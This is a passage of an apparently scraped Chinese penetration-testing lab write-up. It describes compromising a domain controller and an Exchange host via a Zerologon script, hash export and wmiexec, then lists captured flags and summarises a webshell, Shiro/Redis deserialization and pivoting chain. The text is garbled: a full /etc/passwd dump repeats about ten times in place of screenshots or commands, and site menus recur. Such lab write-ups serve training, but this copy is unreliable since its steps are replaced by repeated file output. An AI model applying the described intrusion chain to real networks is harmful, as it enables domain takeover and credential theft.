games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin2

发现存在域控 10.10.10.133 exchange 10.10.10.137

6.1 获取域控权限

cve脚本 https://github.com/dirkjanm/CVE-2020-1472.git

在pc1主机上执行重置本地管理员密码为空

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin3

导出hash

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin4

wmiexec 登录域控

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin5

wmiexec 登录exchage

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologinroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
web:x:1000:1000:web,,,:/home/web:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin6

7.1.Flag

主机名	flag
web123	moonsec_flag{bbb0ae8a2c7d0ecc589621699f28afde}
web	moonsec_flag{17d03da6474ce8beb13b01e79f789e63}
pc1	moonsec_flag{26d300091986f45ca21d1cd6b7b79832}
ad2012	moonsec_flag{6d4db5ff0c117864a02827bad3c361b9}
exchange	moonsec_flag{a81c3d94aa192d3f87ed9f2fffec04fc}

3.总结

这个靶场主要的难点在外网打点通过cve漏洞读取配置里的的账号和密码登录phpmyadmin，通过代码审计找到密文加密方式添加一个后台账号和密码网站后端一般存在很多漏洞，通过代码审计发现后台存在三种拿webshell的方式。这些拿webshell的方式在黑盒的情况下是很难发现的，这太体现了白盒的好处。第二台主机是shiro安全框架登录的时候会自动调用redis的缓存数据，因为缓存数据是对象序列化的，所以可以将恶意的对象序列化数据缓存到redis中，登录时候修改cookie即可触发。再通过读取密钥登录到边际主机对内网进行渗透。内网直接用cve获取域控权限。

推荐站内搜索：最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……

宙飒天下

正文

暗月渗透测试项目6 【sunday】从外网到内网域渗透

暗月渗透测试培训

1.靶场介绍

1.1 靶场账号和密码

1.2 靶场搭建

1.3 靶场拓扑图

2.渗透测试过程

2.1 信息收集

2.2 外网打点

2.3 ueditor任意文件读取漏洞

2.4 phpmyadmin读取文件转换字符

2.5 添加管理员登录

2.6 thinkphp5 文件包含拿webshell

2.7 thinkphp5 反序列化拿webshell

2.9 重装漏洞写webshell

3.1 web主机 linux提权

3.2 配置frp内网上线msf

3.3 开启代理渗透

3.4 穷举redis端口

4.1 shiro redis 反序列化

4.2 编写反序列化脚本

4.3 linux提权解决乱码技巧

5.1 读取ssh密钥登录pc1

5.2 pc1主机信息收集

5.3 整合到msf

5.4 fscan扫描内网

6.1 获取域控权限

7.1.Flag

3.总结

相关阅读

渗透测试完整的内网域渗透

分享几个yakit的插件

【工具分享】内网域渗透小工具（附下载地址）

用友Nday漏洞检测 | yonyou_check（7月14日更新）富婆系列

发表评论取消回复

还没有评论，来说两句吧...

目录[+]

暗月渗透测试培训

1.靶场介绍

1.1 靶场账号和密码

1.2 靶场搭建

1.3 靶场拓扑图

2.渗透测试过程

2.1 信息收集

2.2 外网打点

2.3 ueditor任意文件读取漏洞

2.4 phpmyadmin读取文件转换字符

2.5 添加管理员登录

2.6 thinkphp5 文件包含拿webshell

2.7 thinkphp5 反序列化拿webshell

2.9 重装漏洞写webshell

3.1 web主机 linux提权

3.2 配置frp内网上线msf

3.3 开启代理渗透

3.4 穷举redis端口

4.1 shiro redis 反序列化

4.2 编写反序列化脚本

4.3 linux提权解决乱码技巧

5.1 读取ssh密钥 登录pc1

5.2 pc1主机 信息收集

5.3 整合到msf

5.4 fscan扫描内网

6.1 获取域控权限

7.1.Flag

3.总结

相关阅读

渗透测试 完整的内网域渗透

分享几个yakit的插件

【工具分享】内网域渗透小工具（附下载地址）

用友Nday漏洞检测 | yonyou_check（7月14日更新）富婆系列

发表评论取消回复

还没有评论，来说两句吧...

目录[+]

5.1 读取ssh密钥登录pc1

5.2 pc1主机信息收集

渗透测试完整的内网域渗透